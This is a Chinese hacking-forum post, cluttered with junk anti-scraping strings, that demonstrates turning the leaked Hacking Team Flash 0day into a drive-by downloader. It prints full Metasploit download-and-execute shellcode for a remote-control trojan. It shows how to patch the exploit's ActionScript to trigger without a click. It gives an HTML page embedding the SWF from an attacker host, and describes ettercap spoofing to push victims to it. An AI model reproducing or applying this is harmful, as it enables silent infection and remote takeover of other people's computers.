找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1563|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 X" l7 j6 H& Q6 ]# I$ _7 p 三、flash 0day之手工代码修改制作下载者实例入侵演示 ) ~' s) ?% S, J. ~. C

: a: A& q1 A$ ^1 C- E' V

% J3 Y f6 Z; j& w$ z. V 利用到的工具: + e$ k k7 R- F* Y

6 ]3 e/ h9 ^6 T4 W# l# ]# o( b9 F

( y: s/ b3 ~. u; U% O+ e Msf 3 E) L- F" l, J8 n% d9 C: E3 Q! R

) @' ]7 x5 ~: o* [( E! m9 u

2 m$ K' S' L8 A& W Ettercap ! I1 m! v' j) Z) k: Z

% {' ]+ k' d2 D3 k

/ _, S( @' C) Q Adobe Flash CS6 $ E X% v7 D( e3 g# O5 ^) v% E$ n: [

7 P5 x! ^/ S' S1 v$ x

) u' v9 E! n3 N5 e Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ' r6 Q4 @8 t, X

8 e0 o C1 E, M5 p) u3 S6 w

W) Q* z4 J$ U7 f7 C+ K9 v 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 1 T; m2 d- |* @1 b+ a. ], w- v" G

6 t v1 V- V- q3 O

! [- g( N/ k" P 如图: # w0 H1 h( a4 f/ D& C+ [# o3 s! w5 k

. R( c. I+ ?8 p; f: t9 J8 E2 ] K

; |6 c7 p% `! X   0 u8 h: _$ B! j, P- _+ w, W

1 v& A( H' u) y- `) P: c- s

! i; D6 w8 t* Z' [4 |& r   2 b3 n. p$ t" c7 J* u/ ]

6 F8 F. A# y4 S$ L0 q# ?

' h+ P" q2 j3 X5 Y, s& ^( T4 u# M+ ^ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) F/ U3 T. w# `

, i6 o9 x% C' D2 q' n

* z' G0 W) e K4 I   : z2 C- t: k2 @2 U

+ C9 j) A$ w* l

$ a6 K( j1 H3 t# L1 e9 a   , \+ { E3 s, _* J

1 X. P& G+ ^' l7 O! ]

% t5 W8 O( L, `* E# P% j7 V7 O6 b T7 q 然后执行generate -t dword生成shellcode,如下: 8 O! o/ q, T. T: U/ m: k

7 P! J4 t) n. o2 J" I7 v- p0 z

; F3 Y' x/ f% q( M$ `   ! n/ {" S/ {% C6 t% }' A, ]# ~

: a b- S& U6 U: \& p# C

/ V, k( |/ U1 v3 j; w9 Z 复制代码到文本下便于我们一会编辑flash exp,如下: # ?' G9 D+ M# N# U( X* r5 ~

5 V' O" v( Y$ V

$ b5 M* }! _ e# f0 ~$ c" i. n 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 4 I) r: }* j7 i; r9 Z1 L- ]

7 v+ Q6 k; L8 u" e" C- w

$ k+ J: M) r5 T' O9 Y' b 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : \6 h! G5 ?) d/ l: h

# v& @( B9 v n

( N) d/ h: D" s, w 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, # s1 Y- e4 F$ I+ X

/ p8 @ m: e: B2 N: X' v d

1 j7 ?7 L4 k* t) E. c) `* w 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, # q; ^& u1 M; R0 z6 y

2 Q; K+ k" s+ u7 c

" }. v$ w+ R; } 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 K# P% F$ s4 Q6 c: o7 j

( C x7 p8 M3 l; L" A

$ o" S7 D6 S7 I! _4 ? 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, $ Y6 ]. ]* [ \; m/ P1 e: g

2 l, C/ X1 ]' Y

' v g; U! M6 b' {/ L1 b& M 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 7 G5 x1 c0 m& |4 k; F. j; r- W0 K

$ B( f/ j* T; T5 e; p* `

4 A4 c% o! w1 Z2 w: D9 n/ f 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 9 F6 @7 P7 X+ r3 H7 j. s

1 i# Z% P4 c3 G. Q& o g+ ^. j

- f) v- g* \8 V 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ) m7 [4 Q J, V2 Y. C

) ?; I9 ?. ~2 D' g: @7 o4 i+ e" h

5 v. j# w2 L8 t) b+ d* _ 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & I- `1 m# ?8 W7 L

2 c5 v2 Y/ N- z) b8 c8 f* r8 V& x

3 G2 b' \' x$ k$ c5 | 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ' b/ T! y; M+ f$ F5 l2 ~

) c$ l% T$ }+ D( p

4 _+ g* f# P2 f# d9 N9 y7 j 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + T, [# T* g2 _$ g$ @) O+ b

6 X3 {( p7 n4 `

% O3 a# e( d2 V5 O# U/ @ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 u) _7 P7 G0 C3 N& m" K# n8 @/ `1 F1 U

7 I- @3 u/ O8 k% F" P3 \* X

3 Q: G# h. h3 S5 @& c% X) Y& R( } 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 . `; N1 P5 `) Q& I7 Q, j$ ?

/ Y* Q. f- x0 S( R- F

8 j( P/ J6 x! y# m   % b! u* `& `: Y, Z2 l# q) V

, e5 U% ?- o3 {9 K

; u! Y, ?% [3 h, x; o. u8 a% Q   1 m' Q& p3 j; R. `9 u

/ n* H! m, _6 \ g2 w1 L6 Y( X

& R% C% v: M L" ? 下面我们来修改flash 0day exp,需要修改三个文件,分别为: $ g& E) a [0 F7 C

9 G m8 c* T$ x5 \% z. ? O# f

5 X. w6 g: p7 I! h, J% @   % Y$ @) n D& Q1 G/ z

# u* i' k# A. _1 q& k. p# q

. x" I5 j$ V; a; y' ?5 B8 ] 先修改ShellWin32.as,部分源代码如图: ' n- U2 U6 y$ c6 g, Z) _

5 x$ l0 P( E+ i, _$ Y7 A8 h6 w. Y

: J- L! U' b+ q0 f0 g   ' m1 W) n# d; I: l& o* d$ L

( u3 }. f2 @. J) G$ X

C$ @/ x0 \% ~ u$ O3 ] 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ! F. N" `. Z" z

; h' _7 U% U& f V# v6 E! P3 |% p3 p

# l f" H7 I$ U, c$ M   0 `( \" \$ u( T' E3 g0 {. O

& ^) y+ u( F: y9 x7 V' E

! |: c& B1 g, m# T 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 8 \" i# o8 Q% U8 Y

, D. l1 l# |( A! X1 Z; [. O p+ f7 X

% J! a: G+ y& @" b   + {1 a# U) q5 h- A% I

9 N% B, } M( a! B8 d6 e& m

: H" q0 m* _' h4 x, M, G1 r7 Q 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 r" V( w% P7 F1 h: |

9 X4 H; ]7 d+ ~" j: X4 B9 U

( o; n! t& a5 F+ e- i( H   + R9 V' t+ g& a g6 O0 Y; m/ w* Q

/ V x( b: F6 N, n

" S( `1 u1 Y1 r+ R4 d   ' `2 c( U; l& V) W/ [# e1 v

5 P- t' B$ ?" \

7 i7 O3 Y# q, K8 o   . [8 J# G, N+ e( G

, @- @1 U* v+ C9 q" J8 B

8 o$ z, r% j! O, d' D 然后点保存,下面我们来编译一下,打开 4 w# h# w& x) l2 h- ^4 A2 V1 n* S

2 `3 _3 F- f) U

, o4 W6 H, w3 H) N5 l exp1.fla然后点文件-发布,看看编译没错误 , i1 }& ?& M8 ]- `/ ?

! d4 Q5 n; t2 Z/ T! H& r, L- f

8 I* v; \, ?/ x: u9 B   2 @) c" r9 Q. y+ x8 F9 a- F1 s1 g

8 e- e: ?' R% e2 |9 K

3 n3 T' A; H. [5 o# v1 g, }   , t! p2 Z- |" T: j5 v, x

9 y8 I. A7 a! }3 q

I+ X, }7 o/ e" `$ }' f   % g3 C- `% F! Q# _* [

& u. m: Y* J5 _1 v- h: Q+ p/ H4 \

* S! L i6 v4 O9 m   7 J6 o! N# n) v7 y* R6 d

6 w8 K( d/ `5 s% N3 B

; v4 @0 m6 C6 h; E. v 然后我们把生成的 4 D2 J. B# x" y5 d! `

' @- i( B! g1 P& A/ R% o1 f

' v! t2 Z! L2 Q2 D& v, Y5 w& W& H exp1.swf丢到kailinux /var/www/html下: * `6 b* u' y8 \# a8 h

& f/ Z2 I9 \9 M4 T% P5 z

3 ^& t6 _0 X2 t3 e% C# x+ ^' i 然后把这段代码好好编辑一下 & ?2 _. J+ D# y; k& s0 t i

$ g. W9 S7 h' i8 x' Q1 u7 R' j: A

5 T: u% y+ ?. b( ?   0 g3 ` ~% H; L# |; @8 N1 Q

" Z8 K: t; j! B/ u, C9 L3 F, _( p" O

8 f5 C9 O& j) p8 s0 E# D. @   ' Z9 u# [6 h* m

1 x0 z; T: ` T) `' }: u7 A- m P

. ?, v8 o! H& F" K   % J5 Z1 v% @9 {6 K0 F

% H4 o, E- M- g# e' D" ~

3 p7 X% G y% a4 S. u   - O) a! O- m4 _

4 C% l2 D: z* P% P+ X: |

' S+ W3 Y# }& ?2 D5 a. l   6 v6 `5 Y4 G5 w; ]5 u7 t F

9 @5 Q3 o1 [) H9 O

: o+ R% m, V+ g/ S* y0 E   $ _! A C1 ~% F Y* S1 L

" N7 @, i' T+ d* O& Z: p& R

+ X. }. L' G" D) x <!DOCTYPE html> ) e! y7 L5 @2 p t2 s

$ A0 \( X! Q! N

! v \( Z- \* s m3 c3 T <html> ( l, V: X! O8 S2 T/ x, `4 V8 f" ^

7 j3 T% w8 l9 K5 ^+ D, j% H( x# \& s

3 j3 i) u ^( I9 i <head> : \1 D9 c6 X9 \) G( Q$ `

3 {/ _- ~# D' j) ?

; b0 w9 d' g; @0 j <meta http-equiv="Content-Type" content="text/html; 7 X; S' S6 i& `0 x( a4 I

5 Q4 C/ O0 p' `' V' j! S) y

! Y+ ^6 z2 p2 |/ U+ L1 P charset=utf-8"/> 5 T! ~6 ]/ B% u- b& F! a0 f

- F. B; @+ u" Y

4 r7 |& K6 D3 P# u </head> ) }! f% F' h* @, h" F0 z/ b! I' l

) L5 h# `& G) E) i3 h9 }

% c5 |" S- p% w6 W- [. n5 ] <body> 8 z+ i5 `) k0 f1 t3 u

8 s7 l" V( [ y7 o1 H8 r

2 [2 R7 h" ~. e4 `# B <h2> Please wait, the requested page is loading...</h2> 9 W3 ]6 A: J x4 W0 g6 O

/ N( J$ H/ Y3 B4 V/ F5 _" u* }

* ~- @. |7 f) Q6 g <br> ( n0 U) j3 m! R; V+ I$ E

8 d8 Y3 m3 g0 |1 h1 \ t! i

4 b, v2 p/ @& R; ~+ w% @ <OBJECT ! x7 e( r3 A$ Y& L, q

" d$ m; ] Q! x8 \& S( L+ W

( @6 g3 m6 Y2 C classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie : z: Z$ k6 P9 T2 g

0 L) J5 m5 W$ q) _4 g

% k, ]0 E# A5 d$ P/ r& u: J6 v VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ' W9 r; a' i! X; i- l0 W9 K

. M0 O& K$ m0 H0 b6 x. f. @

; p9 s& _+ w" f# j8 I+ @1 [: E </body> 5 N0 ~+ c# F+ i' A& U4 P. K; J' u0 A

( `6 P6 F! C8 r7 Z: n7 M3 F7 v+ d

$ t; c8 S2 `& A6 i+ a2 l <script> : s; k/ ]+ o3 ^3 m6 ~' n8 y

% e5 m; y b3 e! \; b

4 M6 r' i/ y: R( f3 o     setTimeout(function () { ' w0 w8 {! Y0 o7 i! P* L; k. T

) p& T$ X* v' L# s

) `6 S6 K& ~, ]2 Z p9 f          6 N! L4 u8 \( c& z+ c

4 }! w2 R) }$ x8 c* K

1 k. J* l6 {& t+ e$ v# r window.location.reload(); 9 u; r) {+ W% k2 z2 Q5 A

6 L" M8 U: J) W# R6 \, @

5 ~ O( J' _# E     }, 10000); 7 G; ?, H; A9 Z8 }; x; S0 t0 g

# b: I, R, D3 l! a. P

; n7 Z8 m# b, o O+ ~( h   - z" e% K5 r6 K8 x2 C; n7 S

* \) G( f( t9 W) T9 C* A

0 w7 g; ~6 e3 }# i; `/ j# ^ </script> ; }; V% [ p# s- D: E" Q0 ?) U

! H x7 b/ w \

7 s1 i! b1 l2 u. j; S! x </html> , t- G ~ J- `/ S: E& E7 r

+ q0 l" f9 L& Q5 i( k: ^

- D3 N' d0 |( i' h! Y% n: T   ; A r! l9 [8 w/ _) G) x

A3 c+ x# h7 h" }. G0 Y6 V

) U+ G* F. w' m 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: . Z; U+ a$ s; P. p1 U

8 H7 N8 a2 S* @; K: [/ H4 j, Q

5 I* h; n6 K% n: Y4 s9 c   : q `: ?# x4 T3 t9 y1 J

9 N: j. h" t O& e4 T0 V1 n

7 M# q. B* h E j6 Y   " r7 t; }' E" c% N

' C. t% `: t4 { S# V* ^

; k& m4 D! n$ O# p$ j9 K   ' u4 S) i M0 o% U8 |/ I* R# L) _

9 ^7 H- |% D) T( a' G" m! ?

1 p; F r" C; r- X2 P. q   / `2 ?8 q/ |* _

+ F3 x m, T! c% {* K; c8 U9 O

# `, }2 }2 d3 }3 U, D4 j: Z   ' z' l, `' F& C0 f6 B: S; Q

0 j1 r$ a' H; o7 s. q2 L

6 K$ B6 A" U1 L8 L' v( E 下面我们用ettercap欺骗如图: 1 p% l( R5 T4 q) d

5 T: y( u( x+ v9 \

5 Z C5 [) `' i3 ^+ `& g k   6 t3 Y- d7 O* n4 r6 h5 Q: b5 t

3 ^* c: `& \: B. t6 ~% f4 b

7 R7 a" ~8 o+ \   8 d5 E7 E& }( `0 b2 U

/ Z, p) M8 R8 z% }0 V1 Q

S8 s# z7 ^/ D: ~8 _% ` 下面我们随便访问个网站看看: ; M2 M: |/ M# K/ q

* t$ Q! E' {, s7 m

8 a8 {/ O0 f% m: @3 U$ \ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ' n2 M6 R7 _8 \. ~

2 C, a% K {. ]- d' H6 x

5 g1 v% v* B9 x$ Z6 F   # e9 {% b! S) W. ^- W0 m! Z0 M

9 u0 G3 W. S/ ^7 V

. E- A2 |( Z1 i1 [8 U% b3 ~ 我们看另一台, / E- `- n) G8 d) n" T' l

[( |" N/ {+ l* Y2 n

' N$ T3 v: r- j' q 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 & ]4 t X; h" m$ H4 ] _

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表